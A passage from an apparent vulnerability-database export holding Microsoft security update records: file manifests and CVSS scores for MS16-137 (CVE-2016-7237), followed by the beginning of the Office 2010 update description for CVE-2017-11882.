16:24| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 50,688| 08-Oct-2016| 16:24| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:26| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 52,224| 08-Oct-2016| 16:32| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:34| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 59,904| 08-Oct-2016| 16:25| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:27| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 60,928| 08-Oct-2016| 16:23| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:24| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 49,664| 08-Oct-2016| 15:39| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 8,192| 08-Oct-2016| 15:40| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 55,808| 08-Oct-2016| 16:27| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:28| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 51,200| 08-Oct-2016| 16:31| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:33| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 59,392| 08-Oct-2016| 16:23| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:25| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 41,984| 08-Oct-2016| 16:38| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:39| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 55,808| 08-Oct-2016| 16:26| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:28| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 57,856| 08-Oct-2016| 16:25| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:26| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 30,208| 08-Oct-2016| 16:31| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:33| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 29,696| 08-Oct-2016| 16:37| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:38| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 50,688| 08-Oct-2016| 16:32| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:35| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 56,320| 08-Oct-2016| 16:25| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:27| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 54,784| 08-Oct-2016| 16:27| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:29| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 53,760| 08-Oct-2016| 16:24| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:27| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 56,320| 08-Oct-2016| 16:24| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:27| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 53,760| 08-Oct-2016| 16:25| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:27| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 51,712| 08-Oct-2016| 16:27| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:29| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 50,176| 08-Oct-2016| 16:28| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:29| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 20,992| 08-Oct-2016| 16:32| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:33| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 21,504| 08-Oct-2016| 16:31| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:32| Not applicable \nKsecdd.sys| 6.0.6002.19655| 516,328| 11-May-2016| 13:10| x64 \nLsasrv.dll| 6.0.6002.19701| 1,689,600| 08-Oct-2016| 16:07| x64 \nLsasrv.mof| Not applicable| 13,780| 03-Apr-2009| 21:33| Not applicable \nLsass.exe| 6.0.6002.18541| 11,264| 16-Nov-2011| 14:34| x64 \nSecur32.dll| 6.0.6002.19623| 94,720| 18-Mar-2016| 18:15| x64 \nKsecdd.sys| 6.0.6002.23970| 517,352| 11-May-2016| 13:08| x64 \nLsasrv.dll| 6.0.6002.24025| 1,693,184| 08-Oct-2016| 15:38| x64 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nLsass.exe| 6.0.6002.24025| 11,264| 08-Oct-2016| 14:49| x64 \nSecur32.dll| 6.0.6002.24025| 94,720| 08-Oct-2016| 15:39| x64 \nNcrypt.dll| 6.0.6002.19678| 258,048| 10-Aug-2016| 16:12| x64 \nNcrypt.dll| 6.0.6002.24025| 258,048| 08-Oct-2016| 15:39| x64 \nRpcrt4.dll| 6.0.6002.19598| 1,304,576| 06-Feb-2016| 02:01| x64 \nRpcrt4.dll| 6.0.6002.24025| 1,308,160| 08-Oct-2016| 15:39| x64 \nWdigest.dll| 6.0.6002.19659| 205,824| 14-May-2016| 15:54| x64 \nWdigest.dll| 6.0.6002.24025| 205,824| 08-Oct-2016| 15:40| x64 \nMsv1_0.dll| 6.0.6002.19701| 270,336| 08-Oct-2016| 16:08| x64 \nMsv1_0.dll| 6.0.6002.24025| 270,336| 08-Oct-2016| 15:39| x64 \nSchannel.dll| 6.0.6002.19678| 353,280| 10-Aug-2016| 16:12| x64 \nSchannel.dll| 6.0.6002.24025| 354,304| 08-Oct-2016| 15:39| x64 \nMrxsmb10.sys| 6.0.6002.19431| 278,016| 27-Jun-2015| 14:30| x64 \nMrxsmb10.sys| 6.0.6002.24025| 278,528| 08-Oct-2016| 14:40| x64 \nMrxsmb20.sys| 6.0.6002.19431| 109,056| 27-Jun-2015| 14:30| x64 \nMrxsmb20.sys| 6.0.6002.24025| 110,080| 08-Oct-2016| 14:40| x64 \nMrxsmb.sys| 6.0.6002.19279| 136,192| 09-Jan-2015| 00:28| x64 \nMrxsmb.sys| 6.0.6002.24025| 137,216| 08-Oct-2016| 14:39| x64 \nBcrypt.dll| 6.0.6002.19677| 275,968| 10-Aug-2016| 13:14| x86 \nBcrypt.dll| 6.0.6002.24004| 275,968| 08-Oct-2016| 13:13| x86 \nLsasrv.mof| Not applicable| 13,780| 08-Mar-2016| 00:42| Not applicable \nSecur32.dll| 6.0.6002.19701| 77,312| 08-Oct-2016| 15:52| x86 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nSecur32.dll| 6.0.6002.24025| 77,312| 08-Oct-2016| 15:18| x86 \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86 \nRpcrt4.dll| 6.0.6002.24025| 678,912| 08-Oct-2016| 15:18| x86 \nWdigest.dll| 6.0.6002.19659| 175,616| 14-May-2016| 15:41| x86 \nWdigest.dll| 6.0.6002.24025| 175,616| 08-Oct-2016| 15:18| x86 \nMsv1_0.dll| 6.0.6002.19701| 219,136| 08-Oct-2016| 15:51| x86 \nMsv1_0.dll| 6.0.6002.24025| 219,136| 08-Oct-2016| 15:17| x86 \nSchannel.dll| 6.0.6002.19678| 284,160| 10-Aug-2016| 15:44| x86 \nSchannel.dll| 6.0.6002.24025| 284,672| 08-Oct-2016| 15:18| x86 \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 380,928| 08-Oct-2016| 16:15| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 401,408| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 266,240| 08-Oct-2016| 15:29| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 376,832| 08-Oct-2016| 16:13| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:19| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:21| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:30| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 356,352| 08-Oct-2016| 16:26| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 348,160| 08-Oct-2016| 16:20| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86 \nAdvapi32.dll| 6.0.6002.24025| 802,816| 08-Oct-2016| 15:15| x86 \nNcrypt.dll| 6.0.6002.19678| 206,336| 10-Aug-2016| 15:43| x86 \nNcrypt.dll| 6.0.6002.24025| 205,312| 08-Oct-2016| 15:17| x86 \nFor all supported x86-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 380,928| 08-Oct-2016| 16:15| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 401,408| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 266,240| 08-Oct-2016| 15:29| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 376,832| 08-Oct-2016| 16:13| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:19| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:21| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:30| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 356,352| 08-Oct-2016| 16:26| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 348,160| 08-Oct-2016| 16:20| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86 \nAdvapi32.dll| 6.0.6002.24025| 802,816| 08-Oct-2016| 15:15| x86 \nBcrypt.dll| 6.0.6002.19677| 274,944| 10-Aug-2016| 13:13| x86 \nBcrypt.dll| 6.0.6002.24004| 274,944| 08-Oct-2016| 13:13| x86 \nLsasrv.dll.mui| 6.0.6002.24025| 53,248| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:09| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:12| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,776| 08-Oct-2016| 16:12| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 57,344| 08-Oct-2016| 15:20| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 8,704| 08-Oct-2016| 15:21| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 53,248| 08-Oct-2016| 16:00| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:02| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:02| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 40,960| 08-Oct-2016| 16:06| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:08| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 40,960| 08-Oct-2016| 16:13| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:15| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:12| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:14| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:15| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:17| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,776| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:14| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:16| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 28,672| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 32,768| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nKsecdd.sys| 6.0.6002.19655| 440,552| 11-May-2016| 13:09| x86 \nLsasrv.dll| 6.0.6002.19701| 1,259,008| 08-Oct-2016| 15:50| x86 \nLsasrv.mof| Not applicable| 13,780| 03-Apr-2009| 21:30| Not applicable \nLsass.exe| 6.0.6002.18541| 9,728| 16-Nov-2011| 14:12| x86 \nSecur32.dll| 6.0.6002.19623| 72,704| 18-Mar-2016| 17:10| x86 \nKsecdd.sys| 6.0.6002.23970| 440,552| 11-May-2016| 13:07| x86 \nLsasrv.dll| 6.0.6002.24025| 1,262,592| 08-Oct-2016| 15:17| x86 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nLsass.exe| 6.0.6002.24025| 9,728| 08-Oct-2016| 14:24| x86 \nSecur32.dll| 6.0.6002.24025| 72,704| 08-Oct-2016| 15:18| x86 \nNcrypt.dll| 6.0.6002.19678| 206,336| 10-Aug-2016| 15:43| x86 \nNcrypt.dll| 6.0.6002.24025| 205,312| 08-Oct-2016| 15:17| x86 \nRpcrt4.dll| 6.0.6002.19598| 783,872| 06-Feb-2016| 02:12| x86 \nRpcrt4.dll| 6.0.6002.24025| 783,872| 08-Oct-2016| 15:18| x86 \nWdigest.dll| 6.0.6002.19659| 175,616| 14-May-2016| 15:41| x86 \nWdigest.dll| 6.0.6002.24025| 175,616| 08-Oct-2016| 15:18| x86 \nMsv1_0.dll| 6.0.6002.19701| 219,136| 08-Oct-2016| 15:51| x86 \nMsv1_0.dll| 6.0.6002.24025| 219,136| 08-Oct-2016| 15:17| x86 \nSchannel.dll| 6.0.6002.19678| 284,160| 10-Aug-2016| 15:44| x86 \nSchannel.dll| 6.0.6002.24025| 284,672| 08-Oct-2016| 15:18| x86 \nMrxsmb10.sys| 6.0.6002.19431| 217,088| 27-Jun-2015| 14:21| x86 \nMrxsmb10.sys| 6.0.6002.24025| 217,088| 08-Oct-2016| 14:18| x86 \nMrxsmb20.sys| 6.0.6002.19431| 81,408| 27-Jun-2015| 14:21| x86 \nMrxsmb20.sys| 6.0.6002.24025| 82,432| 08-Oct-2016| 14:17| x86 \nMrxsmb.sys| 6.0.6002.19279| 107,008| 09-Jan-2015| 00:17| x86 \nMrxsmb.sys| 6.0.6002.24025| 107,520| 08-Oct-2016| 14:17| x86 \n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-08T08:00:00", "type": "mskb", "title": "MS16-137: Description of the security update for Windows authentication methods: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7237"], "modified": "2016-11-08T08:00:00", "id": "KB3198510", "href": "https://support.microsoft.com/en-us/help/3198510", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T22:49:52", "description": "<html><body><p>Description of the security update for Office 2010: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" class=\"managed-link content-anchor-link\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB2553204\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=215fab9f-ab5b-4a8e-ae2d-858a9001332e\" managed-link=\"\">Download the security update KB2553204 for the 32-bit version of Office 2010</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=bea73649-b3bc-4fad-ad1d-1a8c374fd8e4\" managed-link=\"\">Download the security update KB2553204 for the 64-bit version of Office 2010</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a 